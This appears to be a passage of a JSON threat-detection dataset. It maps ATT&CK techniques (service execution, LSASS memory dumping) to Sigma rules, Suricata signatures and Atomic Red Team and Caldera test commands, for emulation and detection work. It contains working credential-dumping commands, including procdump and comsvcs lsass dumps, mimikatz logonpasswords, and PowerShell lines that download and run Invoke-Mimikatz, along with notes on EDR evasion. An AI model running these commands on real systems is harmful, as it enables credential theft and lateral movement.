Execution", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\sc.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "start|create|query|config" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\SYSTEM\\CurrentControlSet\\services" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SYSTEM\\CurrentControlSet\\services" + } + }, + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\lsass.exe|\\\\Windows\\\\.+\\\\svchost.exe", + "flag": "regex", + "op": "not" + } + }, + "op": "and" + } + ] + }, + { + "Empire Module": "powershell/lateral_movement/invoke_psexec", + "ATT&CK Technique #1": "T1035", + "ATT&CK Technique #2": "T1077", + "Technique": "Service Execution\u00a0", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_psexec\": [\"T1035\",\"T1077\"]," + }, + { + "Rules": "ET Open", + "SID": "2026879", + "Signature": "ET POLICY Possible winexe over SMB - Possible Lateral Movement", + "Verified": "YES" + }, + { + "Rules": "ET Open", + "SID": "2010781", + "Signature": "ET POLICY PsExec service created", + "Verified": "YES" + } + ], + "queries": [ + { + "product": "Suricata (NSM)", + "query": "ET POLICY Possible winexe over SMB - Possible Lateral Movement", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY PsExec service created", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", + "date": "2018/03/20", + "references": [ + "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/" + ], + "tags": [ + "attack.lateral_movement", + "attack.execution", + "attack.t1077", + "attack.t1035" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "service_installation": { + "EventID": 7045, + "ServiceName": "BTOBTO", + "ServiceFileName": "*\\execute.bat" + }, + "condition": "service_installation" + }, + "fields": [ + "ServiceName", + "ServiceFileName" + ], + "falsepositives": [ + "Penetration Test", + "Unknown" + ], + "level": "critical" + }, + { + "title": "PsExec Service Start", + "id": "3ede524d-21cc-472d-a3ce-d21b568d8db7", + "description": "Detects a PsExec service start", + "author": "Florian Roth", + "date": "2018/03/13", + "modified": "2012/12/11", + "tags": [ + "attack.execution", + "attack.t1035", + "attack.s0029" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ProcessCommandLine": "C:\\Windows\\PSEXESVC.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Administrative activity" + ], + "level": "low" + }, + { + "title": "Service Execution", + "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "status": "experimental", + "description": "Detects manual service execution (start) via system utilities", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1035/T1035.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": [ + "\\net.exe", + "\\net1.exe" + ], + "CommandLine|contains": " start " + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administrator or user executes a service for legitimate reason" + ], + "level": "low", + "tags": [ + "attack.execution", + "attack.t1035" + ] + }, + { + "action": "global", + "title": "PsExec Tool Execution", + "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "status": "experimental", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", + "references": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet" + ], + "tags": [ + "attack.execution", + "attack.t1035", + "attack.s0029" + ], + "detection": { + "condition": "1 of them" + }, + "fields": [ + "EventID", + "CommandLine", + "ParentCommandLine", + "ServiceName", + "ServiceFileName" + ], + "falsepositives": [ + "unknown" + ], + "level": "low" + }, + { + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "service_installation": { + "EventID": 7045, + "ServiceName": "PSEXESVC", + "ServiceFileName": "*\\PSEXESVC.exe" + }, + "service_execution": { + "EventID": 7036, + "ServiceName": "PSEXESVC" + } + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "sysmon_processcreation": { + "Image": "*\\PSEXESVC.exe", + "User": "NT AUTHORITY\\SYSTEM" + } + } + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "7045", + "New Service" + ], + [ + "7040", + "Service Change" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "7040/7045", + "New and changed Service" + ] + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/" + ] + }, + { + "technique_id": "T1003.001", + "command_list": [ + "#{procdump_exe} -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe -accepteula -ma lsass.exe #{output_file}\n", + "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full\n", + "PathToAtomicsFolder\\T1003.001\\bin\\Outflank-Dumpert.exe\n", + "%temp%\\nanodump.x64.exe -w \"%temp%\\nanodump.dmp\"\n", + "#{mimikatz_exe} \"sekurlsa::minidump %tmp%\\lsass.DMP\" \"sekurlsa::logonpasswords full\" exit\n", + "PathToAtomicsFolder\\T1003.001\\bin\\mimikatz.exe \"sekurlsa::minidump #{input_file}\" \"sekurlsa::logonpasswords full\" exit\n", + "pypykatz live lsa\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump\n", + "#{procdump_exe} -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe -accepteula -mm lsass.exe #{output_file}\n", + "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\n", + "echo \"Createdump Path #{createdump_exe}\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"#{createdump_exe}\" -u -f C:\\Windows\\Temp\\dotnet-lsass.dmp $ID\n", + "echo \"Createdump Path C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\" -u -f #{output_file} $ID\n", + "C:\\Windows\\Temp\\xordump.exe -out #{output_file} -x 0x41\n", + "#{xordump_exe} -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41\n", + "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n iex $staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n", + "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n", + "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; Invoke-Mimikatz -DumpCreds\n" + ], + "commands": [ + { + "command": "#{procdump_exe} -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe -accepteula -ma lsass.exe #{output_file}\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "PathToAtomicsFolder\\T1003.001\\bin\\Outflank-Dumpert.exe\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "%temp%\\nanodump.x64.exe -w \"%temp%\\nanodump.dmp\"\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "#{mimikatz_exe} \"sekurlsa::minidump %tmp%\\lsass.DMP\" \"sekurlsa::logonpasswords full\" exit\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "PathToAtomicsFolder\\T1003.001\\bin\\mimikatz.exe \"sekurlsa::minidump #{input_file}\" \"sekurlsa::logonpasswords full\" exit\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "pypykatz live lsa\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "#{procdump_exe} -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe -accepteula -mm lsass.exe #{output_file}\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "echo \"Createdump Path #{createdump_exe}\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"#{createdump_exe}\" -u -f C:\\Windows\\Temp\\dotnet-lsass.dmp $ID\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "echo \"Createdump Path C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\" -u -f #{output_file} $ID\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "C:\\Windows\\Temp\\xordump.exe -out #{output_file} -x 0x41\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "#{xordump_exe} -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n iex $staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n", + "source": "data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml", + "name": "Dump lsass for later use with mimikatz" + }, + { + "command": "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n", + "source": "data/abilities/credential-access/7049e3ec-b822-4fdf-a4ac-18190f9b66d1.yml", + "name": "Use Invoke-Mimikatz" + }, + { + "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; Invoke-Mimikatz -DumpCreds\n", + "source": "data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml", + "name": "Use powerkatz to execute mimikatz and attempt to grab plaintext and/or hashed passwords" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.001", + "display_name": "OS Credential Dumping: LSASS Memory", + "atomic_tests": [ + { + "name": "Dump LSASS.exe Memory using ProcDump", + "auto_generated_guid": "0be2230c-9ab3-4ac2-8826-3199b9a0ebf8", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals\nProcDump.\n\nUpon successful execution, you should see the following file created c:\\windows\\temp\\lsass_dump.dmp.\n\nIf you see a message saying \"procdump.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install the ProcDump tool first.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\lsass_dump.dmp" + }, + "procdump_exe": { + "description": "Path of Procdump executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})\n", + "prereq_command": "if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://download.sysinternals.com/files/Procdump.zip\" -OutFile \"$env:TEMP\\Procdump.zip\"\nExpand-Archive $env:TEMP\\Procdump.zip $env:TEMP\\Procdump -Force\nNew-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\Procdump\\Procdump.exe #{procdump_exe} -Force\n" + } + ], + "executor": { + "command": "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n", + "cleanup_command": "del \"#{output_file}\" >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using comsvcs.dll", + "auto_generated_guid": "2536dee2-12fb-459a-8c37-971844fa73be", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.\n\nUpon successful execution, you should see the following file created $env:TEMP\\lsass-comsvcs.dmp.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full\n", + "cleanup_command": "Remove-Item $env:TEMP\\lsass-comsvcs.dmp -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using direct system calls and API unhooking", + "auto_generated_guid": "7ae7102c-a099-45c8-b985-4c7a2d05790d", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. \nhttps://github.com/outflanknl/Dumpert\nhttps://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/\nUpon successful execution, you should see the following file created C:\\\\windows\\\\temp\\\\dumpert.dmp.\n\nIf you see a message saying \\\"The system cannot find the path specified.\\\", try using the get-prereq_commands to download the tool first.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dumpert_exe": { + "description": "Path of Dumpert executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003.001\\bin\\Outflank-Dumpert.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Dumpert executable must exist on disk at specified location (#{dumpert_exe})\n", + "prereq_command": "if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null\nInvoke-WebRequest \"https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe\" -OutFile #{dumpert_exe}\n" + } + ], + "executor": { + "command": "#{dumpert_exe}\n", + "cleanup_command": "del C:\\windows\\temp\\dumpert.dmp >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using NanoDump", + "auto_generated_guid": "dddd4aca-bbed-46f0-984d-e4c5971c51ea", + "description": "The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.\n\nhttps://github.com/helpsystems/nanodump\n\nUpon successful execution, you should find the nanondump.dmp file in the temp directory\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "NanoDump executable must exist on disk at specified location ($env:TEMP\\nanodump.x64.exe)\n", + "prereq_command": "if (Test-Path $env:TEMP\\nanodump.x64.exe) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe\" -OutFile \"$env:TEMP\\nanodump.x64.exe\"\n" + } + ], + "executor": { + "command": "%temp%\\nanodump.x64.exe -w \"%temp%\\nanodump.dmp\"\n", + "cleanup_command": "del \"%temp%\\nanodump.dmp\" >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using Windows Task Manager", + "auto_generated_guid": "dea6c349-f1c6-44f3-87a1-1ed33a59a607", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task\nManager and administrative permissions.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "steps": "1. Open Task Manager:\n On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking\n on the task bar and selecting \"Task Manager\".\n\n2. Select lsass.exe:\n If lsass.exe is not visible, select \"Show processes from all users\". This will allow you to observe execution of lsass.exe\n and select it for manipulation.\n\n3. Dump lsass.exe memory:\n Right-click on lsass.exe in Task Manager. Select \"Create Dump File\". The following dialog will show you the path to the saved file.\n", + "name": "manual" + } + }, + { + "name": "Offline Credential Theft With Mimikatz", + "auto_generated_guid": "453acf13-1dbd-47d7-b28a-172ce9228023", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with\nMimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path of the Lsass dump", + "type": "Path", + "default": "%tmp%\\lsass.DMP" + }, + "mimikatz_exe": { + "description": "Path of the Mimikatz binary", + "type": "String", + "default": "PathToAtomicsFolder\\T1003.001\\bin\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz must exist on disk at specified location (#{mimikatz_exe})\n", + "prereq_command": "if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\Mimi.zip\"\nExpand-Archive $env:TEMP\\Mimi.zip $env:TEMP\\Mimi -Force\nNew-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\Mimi\\x64\\mimikatz.exe #{mimikatz_exe} -Force\n" + }, + { + "description": "Lsass dump must exist at specified location (#{input_file})\n", + "prereq_command": "cmd /c \"if not exist #{input_file} (exit /b 1)\"\n", + "get_prereq_command": "Write-Host \"Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)\"\n" + } + ], + "executor": { + "command": "#{mimikatz_exe} \"sekurlsa::minidump #{input_file}\" \"sekurlsa::logonpasswords full\" exit\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "LSASS read with pypykatz", + "auto_generated_guid": "c37bc535-5c62-4195-9cc3-0517673171d8", + "description": "Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::\n\nPython 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.\n\nSuccessful execution of this test will display multiple useranames and passwords/hashes to the screen.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Computer must have python 3 installed\n", + "prereq_command": "py -3 --version >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + }, + { + "description": "Computer must have pip installed\n", + "prereq_command": "py -3 -m pip --version >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "echo \"PIP must be installed manually\"\n" + }, + { + "description": "pypykatz must be installed and part of PATH\n", + "prereq_command": "pypykatz -h >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "pip install pypykatz\n" + } + ], + "executor": { + "command": "pypykatz live lsa\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using Out-Minidump.ps1", + "auto_generated_guid": "6502c8f0-b775-4dbd-9193-1298f56b6781", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure\npowershell implementation that leverages the MiniDumpWriteDump Win32 API call.\nUpon successful execution, you should see the following file created $env:SYSTEMROOT\\System32\\lsass_*.dmp.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump\n", + "cleanup_command": "Remove-Item $env:TEMP\\lsass_*.dmp -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Create Mini Dump of LSASS.exe using ProcDump", + "auto_generated_guid": "7cede33f-0acd-44ef-9774-15511300b24b", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals\nProcDump. This particular method uses -mm to produce a mini dump of lsass.exe\n\nUpon successful execution, you should see the following file created c:\\windows\\temp\\lsass_dump.dmp.\n\nIf you see a message saying \"procdump.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install the ProcDump tool first.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\lsass_dump.dmp" + }, + "procdump_exe": { + "description": "Path of Procdump executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})\n", + "prereq_command": "if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/Procdump.zip\" -OutFile \"$env:TEMP\\Procdump.zip\"\nExpand-Archive $env:TEMP\\Procdump.zip $env:TEMP\\Procdump -Force\nNew-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\Procdump\\Procdump.exe #{procdump_exe} -Force\n" + } + ], + "executor": { + "command": "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n", + "cleanup_command": "del \"#{output_file}\" >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Powershell Mimikatz", + "auto_generated_guid": "66fb0bc1-3c3f-47e9-a298-550ecfefacbc", + "description": "Dumps credentials from memory via Powershell by invoking a remote mimikatz script.\nIf Mimikatz runs successfully you will see several usernames and hashes output to the screen.\nCommon failures include seeing an \\\"access denied\\\" error which results when Anti-Virus blocks execution. \nOr, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_script": { + "description": "URL to a remote Mimikatz script that dumps credentials", + "type": "Url", + "default": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1" + } + }, + "executor": { + "command": "IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Dump LSASS with .Net 5 createdump.exe", + "auto_generated_guid": "9d0072c8-7cca-45c4-bd14-f852cfa35cf0", + "description": "This test uses the technique describe in this tweet \n(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\dotnet-lsass.dmp" + }, + "createdump_exe": { + "description": "Path of createdump.exe executable", + "type": "Path", + "default": "C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must have createdump.exe from .Net 5\n", + "prereq_command": "if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \".NET 5 must be installed manually.\" \"For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe\"\n" + } + ], + "executor": { + "command": "echo \"Createdump Path #{createdump_exe}\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"#{createdump_exe}\" -u -f #{output_file} $ID\n", + "cleanup_command": "Remove-Item #{output_file} -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe using imported Microsoft DLLs", + "auto_generated_guid": "86fc3f40-237f-4701-b155-81c01c48d697", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by\nimporting built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump \nfile and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.\n\nUpon successful execution, you should see the following file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xordump_exe": { + "description": 